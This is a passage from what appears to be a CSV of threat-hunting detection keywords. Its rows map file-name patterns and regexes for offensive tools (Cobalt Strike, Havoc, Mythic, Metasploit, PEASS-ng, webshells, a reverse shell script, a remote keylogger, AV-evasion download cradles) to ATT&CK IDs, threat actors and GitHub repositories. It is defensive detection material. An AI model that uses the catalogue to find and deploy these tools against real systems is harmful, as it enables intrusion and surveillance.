Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","9555" "*/payload_placement.exe*",".{0,1000}\/payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9556" "*/payload_scripts*",".{0,1000}\/payload_scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - 
Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","9557" "*/payload_scripts/artifact*",".{0,1000}\/payload_scripts\/artifact.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","9558" "*/payload_service.sh*",".{0,1000}\/payload_service\.sh.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9559" "*/Payload_Type/athena*",".{0,1000}\/Payload_Type\/athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9560" "*/Payload_Types/*",".{0,1000}\/Payload_Types\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","9561" "*/payload2.ps1*",".{0,1000}\/payload2\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9562" "*/Payload-Download-Cradles.git*",".{0,1000}\/Payload\-Download\-Cradles\.git.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","9563" "*/payloads/DllLdr/*",".{0,1000}\/payloads\/DllLdr\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 
- T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","9564" "*/payloads/util*",".{0,1000}\/payloads\/util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9565" "*/payloadtests.py*",".{0,1000}\/payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","9566" 
"*/pcanywhere-brute.nse*",".{0,1000}\/pcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9568" "*/pcworx-info.nse*",".{0,1000}\/pcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9579" "*/PDF_Payload/script.txt*",".{0,1000}\/PDF_Payload\/script\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","9580" "*/pdf2john.py*",".{0,1000}\/pdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9581" "*/pdf-exploit.git*","\/pdf\-exploit\.git","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource 
Development","https://github.com/rzte/pdf-exploit","1","1","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","9582" "*/pe/dll*",".{0,1000}\/pe\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9583" "*/PE/InjectPE.cs*",".{0,1000}\/PE\/InjectPE\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","9584" "*/pe_to_shellcode*",".{0,1000}\/pe_to_shellcode.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a 
shellcode","T1027 - T1059.004 - T1105 - T1036","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","N/A","10","2521","452","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z","9585" "*/pe2shc.exe*",".{0,1000}\/pe2shc\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","9586" "*/pe2shc/*",".{0,1000}\/pe2shc\/.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1027 - T1059.004 - T1105 - T1036","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","N/A","10","2521","452","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z","9587" "*/PEASS-ng.git*",".{0,1000}\/PEASS\-ng\.git.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9588" "*/PEASS-ng.git*",".{0,1000}\/PEASS\-ng\.git.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9589" "*/PEASS-ng/*",".{0,1000}\/PEASS\-ng\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - 
T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9590" "*/PEASS-ng/releases/*",".{0,1000}\/PEASS\-ng\/releases\/.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","9591" "*/peeping-client.exe*",".{0,1000}\/peeping\-client\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9592" "*/peeping-tom.app*",".{0,1000}\/peeping\-tom\.app.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","#macos","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9593" "*/peeping-tom.exe*",".{0,1000}\/peeping\-tom\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9594" 
"*/peeping-tom.git*",".{0,1000}\/peeping\-tom\.git.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","9595" "*/PeerToPeerService.*",".{0,1000}\/PeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","9596" "*/peinjector*",".{0,1000}\/peinjector.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9597" "*/peinjector.*",".{0,1000}\/peinjector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9598" "*/pendulum.git*",".{0,1000}\/pendulum\.git.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","9599" "*/pentest*",".{0,1000}\/pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. 
repository or command line","N/A","N/A","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9600" "*/PE-Obfuscator*",".{0,1000}\/PE\-Obfuscator.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","9601" "*/perf_swevent64*",".{0,1000}\/perf_swevent64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9603" "*/Perfusion.exe*",".{0,1000}\/Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","9604" "*/Perfusion.git*",".{0,1000}\/Perfusion\.git.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","9605" "*/PerfusionDll.dll*",".{0,1000}\/PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","9606" "*/Perl Web Shell by RST-GHC.pl*",".{0,1000}\/Perl\sWeb\sShell\sby\sRST\-GHC\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9608" "*/perl-reverse-shell.pl*",".{0,1000}\/perl\-reverse\-shell\.pl.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","9609" "*/perlweb_shell.pl*",".{0,1000}\/perlweb_shell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9610" "*/persist.tpl*",".{0,1000}\/persist\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9611" "*/persist_bitsadmin.py*",".{0,1000}\/persist_bitsadmin\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - 
T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9612" "*/persist_cortana.py*",".{0,1000}\/persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9613" "*/persist_cortana.py*",".{0,1000}\/persist_cortana\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9614" "*/persist_dll_explorer.py*",".{0,1000}\/persist_dll_explorer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9615" "*/persist_hkcu_run.py*",".{0,1000}\/persist_hkcu_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","1","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9616" "*/persist_hklm_run.py*",".{0,1000}\/persist_hklm_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9617" "*/persist_ifeo.py*",".{0,1000}\/persist_ifeo\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9618" "*/persist_mofcomp.py*",".{0,1000}\/persist_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9619" "*/persist_people.py*",".{0,1000}\/persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9620" 
